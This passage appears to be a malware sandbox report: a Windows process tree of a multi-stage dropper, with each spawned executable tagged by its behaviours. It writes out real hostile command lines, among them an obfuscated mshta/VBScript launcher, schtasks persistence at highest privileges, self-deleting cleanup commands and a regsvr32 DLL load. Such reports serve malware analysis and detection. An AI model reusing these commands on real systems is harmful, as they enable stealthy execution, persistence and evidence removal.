C:\Windows\SysWOW64\taskkill.exetaskkill -Im "6817322.exe" /F9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2568
-
-
-
-
-
C:\ProgramData\2537520.exe"C:\ProgramData\2537520.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4640 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 24287⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4224
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4280 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4280 -s 19566⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4608
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"5⤵
- Executes dropped EXE
PID:4356 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 1926⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5080
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4612
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md1_1eaf.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md1_1eaf.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:2348
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\b81bc93c.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\b81bc93c.exe"4⤵
- Executes dropped EXE
PID:3944 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 2965⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:504
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\asd.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\asd.exe"4⤵
- Executes dropped EXE
PID:5008 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 2845⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:812
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3524 -
C:\Users\Admin\Documents\B7oBRefKlnvLxTUk7A5247IV.exe"C:\Users\Admin\Documents\B7oBRefKlnvLxTUk7A5247IV.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5108 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5108 -s 2806⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5612
-
-
-
C:\Users\Admin\Documents\wUJlGzFeEH6o0Z1DQAZWu72E.exe"C:\Users\Admin\Documents\wUJlGzFeEH6o0Z1DQAZWu72E.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1144 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Helper.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Helper.exe6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4888 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 11607⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:6072
-
-
-
-
C:\Users\Admin\Documents\_JId4e8RMtjJlE0E_0myM75Q.exe"C:\Users\Admin\Documents\_JId4e8RMtjJlE0E_0myM75Q.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5104
-
-
C:\Users\Admin\Documents\7Zn3Pn08QssXfVxAesGVzaIB.exe"C:\Users\Admin\Documents\7Zn3Pn08QssXfVxAesGVzaIB.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1724
-
-
C:\Users\Admin\Documents\DPR8aeTAKot62jgARQMVE86Y.exe"C:\Users\Admin\Documents\DPR8aeTAKot62jgARQMVE86Y.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2268
-
-
C:\Users\Admin\Documents\maFWooMFK5Qj2Qi4Tp5ge2LX.exe"C:\Users\Admin\Documents\maFWooMFK5Qj2Qi4Tp5ge2LX.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2400
-
-
C:\Users\Admin\Documents\FFApTDMNevZhT9xoFqdxz9G5.exe"C:\Users\Admin\Documents\FFApTDMNevZhT9xoFqdxz9G5.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3652
-
-
C:\Users\Admin\Documents\VGzbIkLyVi91CjT1VcFgnzRu.exe"C:\Users\Admin\Documents\VGzbIkLyVi91CjT1VcFgnzRu.exe"5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:4792 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:5152
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:5144
-
-
-
C:\Users\Admin\Documents\Z0C9e0hIzHto92rlBJjZT0HV.exe"C:\Users\Admin\Documents\Z0C9e0hIzHto92rlBJjZT0HV.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:1408 -
C:\Users\Admin\Documents\Z0C9e0hIzHto92rlBJjZT0HV.exe"C:\Users\Admin\Documents\Z0C9e0hIzHto92rlBJjZT0HV.exe"6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:5168
-
-
-
C:\Users\Admin\Documents\xPAAlqXyVJs72ZYjY5o9Mv0L.exe"C:\Users\Admin\Documents\xPAAlqXyVJs72ZYjY5o9Mv0L.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5036 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL").Run( "cmD.exe /Q /c TYPE ""C:\Users\Admin\Documents\xPAAlqXyVJs72ZYjY5o9Mv0L.exe"" > X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if """"== """" for %A IN (""C:\Users\Admin\Documents\xPAAlqXyVJs72ZYjY5o9Mv0L.exe"" ) do taskkill /f -im ""%~nxA"" " , 0, trUE ) )6⤵PID:2788
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\Documents\xPAAlqXyVJs72ZYjY5o9Mv0L.exe"> X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV &if ""== "" for %A IN ("C:\Users\Admin\Documents\xPAAlqXyVJs72ZYjY5o9Mv0L.exe" ) do taskkill /f -im "%~nxA"7⤵PID:3748
-
C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXEX4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV8⤵
- Executes dropped EXE
PID:1736 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL").Run( "cmD.exe /Q /c TYPE ""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" > X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if ""-PXPoqL0iOUHHP7hXFattB5ZvsV ""== """" for %A IN (""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" ) do taskkill /f -im ""%~nxA"" " , 0, trUE ) )9⤵PID:5300
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"> X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV &if "-PXPoqL0iOUHHP7hXFattB5ZvsV "== "" for %A IN ("C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE" ) do taskkill /f -im "%~nxA"10⤵PID:5524
-
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" -S fOUT6o7J.Mj9⤵
- Loads dropped DLL
PID:2332
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -im "xPAAlqXyVJs72ZYjY5o9Mv0L.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5440
-
-
-
-
-
C:\Users\Admin\Documents\v3MIJzXhkcdk57h9C6fR6Hry.exe"C:\Users\Admin\Documents\v3MIJzXhkcdk57h9C6fR6Hry.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1188
-
-
C:\Users\Admin\Documents\xM8nfaje063EvkNO1NgonNdg.exe"C:\Users\Admin\Documents\xM8nfaje063EvkNO1NgonNdg.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4108 -
C:\Windows\SysWOW64\dllhost.exedllhost.exe6⤵PID:4520
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Nobile.docm6⤵PID:1180
-
C:\Windows\SysWOW64\cmd.execmd7⤵
- Drops file in Program Files directory
PID:1044 -
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^mFzuIhvmvbdHpfegBQvdRBWtkZruqmiMQZvPfzkmbfdsclZwZBnIIvmXJgVJldnWdERlThYiFXSCkFJqZwimwmrxmnuwnBfiQxqRzPi$" Vederlo.docm8⤵PID:5220
-
-
C:\Windows\SysWOW64\PING.EXEping localhost8⤵
- Runs ping.exe
PID:5512
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.comRimasta.exe.com J8⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5504 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.comC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com J9⤵PID:5864
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.comC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com J10⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4948 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.comC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com J11⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4744 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.comC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com J12⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5588 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.comC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com J13⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5400 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.comC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com J14⤵
- Suspicious use of SetWindowsHookEx
PID:5428
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Documents\QLOPdlJjYI7MoPRwJxa1bDht.exe"C:\Users\Admin\Documents\QLOPdlJjYI7MoPRwJxa1bDht.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4636
-
-
C:\Users\Admin\Documents\ttc4qfn2w_h5zeVHlPOzh8EN.exe"C:\Users\Admin\Documents\ttc4qfn2w_h5zeVHlPOzh8EN.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4432 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 2846⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1616
-
-
-
C:\Users\Admin\Documents\NUYBLx5Zp9Uv4LxiycBoW8bN.exe"C:\Users\Admin\Documents\NUYBLx5Zp9Uv4LxiycBoW8bN.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1488 -
C:\Users\Admin\AppData\Local\Temp\{6EA313A2-5EFC-404A-A15A-7F554AFA6B5F}\NUYBLx5Zp9Uv4LxiycBoW8bN.exeC:\Users\Admin\AppData\Local\Temp\{6EA313A2-5EFC-404A-A15A-7F554AFA6B5F}\NUYBLx5Zp9Uv4LxiycBoW8bN.exe /q"C:\Users\Admin\Documents\NUYBLx5Zp9Uv4LxiycBoW8bN.exe" /tempdisk1folder"C:\Users\Admin\AppData\Local\Temp\{6EA313A2-5EFC-404A-A15A-7F554AFA6B5F}" /IS_temp6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3436 -
C:\Windows\SysWOW64\MSIEXEC.EXE"C:\Windows\system32\MSIEXEC.EXE" /i "C:\Users\Admin\AppData\Local\Downloaded Installations\{1AF874E8-B60B-4D74-97B3-5CC53DC87DBC}\menageudrivers.msi" SETUPEXEDIR="C:\Users\Admin\Documents" SETUPEXENAME="NUYBLx5Zp9Uv4LxiycBoW8bN.exe"7⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:5232 -
C:\Users\Admin\AppData\Local\Temp\MSIF5B2.tmp"C:\Users\Admin\AppData\Local\Temp\MSIF5B2.tmp"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5448
-
-
C:\Users\Admin\AppData\Local\Temp\MSIF5A0.tmp"C:\Users\Admin\AppData\Local\Temp\MSIF5A0.tmp"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5544
-
-
C:\Users\Admin\AppData\Local\Temp\MSIF5B1.tmp"C:\Users\Admin\AppData\Local\Temp\MSIF5B1.tmp"8⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5320
-
-
-
-
-
C:\Users\Admin\Documents\RZdj0v2Ms34qv60Et3KRHI1x.exe"C:\Users\Admin\Documents\RZdj0v2Ms34qv60Et3KRHI1x.exe"5⤵
- Executes dropped EXE
PID:1544 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1544 -s 2406⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3016
-
-
-
C:\Users\Admin\Documents\rX0IlY0LeaXpdXrY9k1FvbnV.exe"C:\Users\Admin\Documents\rX0IlY0LeaXpdXrY9k1FvbnV.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2040 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2040 -s 3126⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5712
-
-
-
C:\Users\Admin\Documents\UMwUB7aYnEyPzvvpgV27kGRl.exe"C:\Users\Admin\Documents\UMwUB7aYnEyPzvvpgV27kGRl.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1952
-
-
C:\Users\Admin\Documents\T1Co2sVBqOVKikVL5Z0HVlh_.exe"C:\Users\Admin\Documents\T1Co2sVBqOVKikVL5Z0HVlh_.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1332
-
-
C:\Users\Admin\Documents\P8GPV61e4aQH4Yeejcyjhha2.exe"C:\Users\Admin\Documents\P8GPV61e4aQH4Yeejcyjhha2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1044 -
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5024
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"6⤵
- Executes dropped EXE
PID:2168
-
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1636
-
-
-
C:\Users\Admin\Documents\BBpm_5Q5qrBtb61PhXyaFhcB.exe"C:\Users\Admin\Documents\BBpm_5Q5qrBtb61PhXyaFhcB.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:4688 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\BBpm_5Q5qrBtb61PhXyaFhcB.exe"6⤵PID:5676
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:5524
-
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK7⤵
- Delays execution with timeout.exe
PID:5036
-
-
-
-
C:\Users\Admin\Documents\W0OaMutDODenU7tGyf8ti4VC.exe"C:\Users\Admin\Documents\W0OaMutDODenU7tGyf8ti4VC.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3184
-
-
C:\Users\Admin\Documents\m_HQyecTI5CaVV75_UKBYNsi.exe"C:\Users\Admin\Documents\m_HQyecTI5CaVV75_UKBYNsi.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2948
-
-
C:\Users\Admin\Documents\9hc0EGzp2ovANCVqKn_Ta8VP.exe"C:\Users\Admin\Documents\9hc0EGzp2ovANCVqKn_Ta8VP.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2412 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2412 -s 2926⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5772
-
-
-
C:\Users\Admin\Documents\KY2h2nAcmqPEv6bBk71Gi0MC.exe"C:\Users\Admin\Documents\KY2h2nAcmqPEv6bBk71Gi0MC.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1992
-
-
-
-
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv 1PsfHjy/6UuX87LF/E3WAg.0.21⤵
- Modifies data under HKEY_USERS
PID:4892
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 4280 -ip 42801⤵PID:2416
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4356 -ip 43561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4040
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:884 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:1444 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1444 -s 4523⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4432
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1444 -ip 14441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2416
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 556 -p 5060 -ip 50601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1960
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4640 -ip 46401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4872
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3944 -ip 39441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3392
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5008 -ip 50081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3652
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5108 -ip 51081⤵PID:5320
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:5904
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4888 -ip 48881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5824
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1544 -ip 15441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5960
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
PID:6140
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2040 -ip 20401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2412 -ip 24121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 1992 -ip 19921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5224
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:5788
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4432 -ip 44321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5108
-
C:\Users\Admin\AppData\Local\Temp\21D2.exeC:\Users\Admin\AppData\Local\Temp\21D2.exe1⤵
- Suspicious use of SetThreadContext
PID:4708 -
C:\Users\Admin\AppData\Local\Temp\21D2.exeC:\Users\Admin\AppData\Local\Temp\21D2.exe2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5668
-
-
C:\Users\Admin\AppData\Local\Temp\2926.exeC:\Users\Admin\AppData\Local\Temp\2926.exe1⤵
- Suspicious use of SetThreadContext
PID:5284 -
C:\Users\Admin\AppData\Local\Temp\2926.exeC:\Users\Admin\AppData\Local\Temp\2926.exe2⤵PID:5336
-
-
C:\Users\Admin\AppData\Local\Temp\3117.exeC:\Users\Admin\AppData\Local\Temp\3117.exe1⤵PID:6016
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6016 -s 2962⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3992
-
-
C:\Users\Admin\AppData\Local\Temp\3657.exeC:\Users\Admin\AppData\Local\Temp\3657.exe1⤵PID:2032
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 2882⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1196
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 6016 -ip 60161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2848
-
C:\Users\Admin\AppData\Local\Temp\40A9.exeC:\Users\Admin\AppData\Local\Temp\40A9.exe1⤵PID:4192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 2922⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5408
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2032 -ip 20321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5860
-
C:\Users\Admin\AppData\Local\Temp\47ED.exeC:\Users\Admin\AppData\Local\Temp\47ED.exe1⤵
- Suspicious use of SetThreadContext
PID:1952 -
C:\Users\Admin\AppData\Local\Temp\47ED.exe"C:\Users\Admin\AppData\Local\Temp\47ED.exe"2⤵PID:5568
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1952 -s 10802⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4224
-
-
C:\Users\Admin\AppData\Local\Temp\4DCA.exeC:\Users\Admin\AppData\Local\Temp\4DCA.exe1⤵PID:4748
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4748 -s 3082⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3500
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 180 -p 1952 -ip 19521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1068
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4192 -ip 41921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2944
-
C:\Users\Admin\AppData\Local\Temp\63D4.exeC:\Users\Admin\AppData\Local\Temp\63D4.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1892
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4748 -ip 47481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1188
-
C:\Users\Admin\AppData\Local\Temp\7B06.exeC:\Users\Admin\AppData\Local\Temp\7B06.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:5548 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\uyjWdSFVh & timeout 4 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7B06.exe"2⤵PID:3204
-
C:\Windows\SysWOW64\timeout.exetimeout 43⤵
- Delays execution with timeout.exe
PID:4072
-
-
-
C:\Users\Admin\AppData\Local\Temp\8326.exeC:\Users\Admin\AppData\Local\Temp\8326.exe1⤵
- Suspicious use of SetThreadContext
PID:500 -
C:\Users\Admin\AppData\Local\Temp\8326.exeC:\Users\Admin\AppData\Local\Temp\8326.exe2⤵PID:3448
-
-
C:\Users\Admin\AppData\Local\Temp\8C6E.exeC:\Users\Admin\AppData\Local\Temp\8C6E.exe1⤵PID:1092
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 2922⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1580
-
-
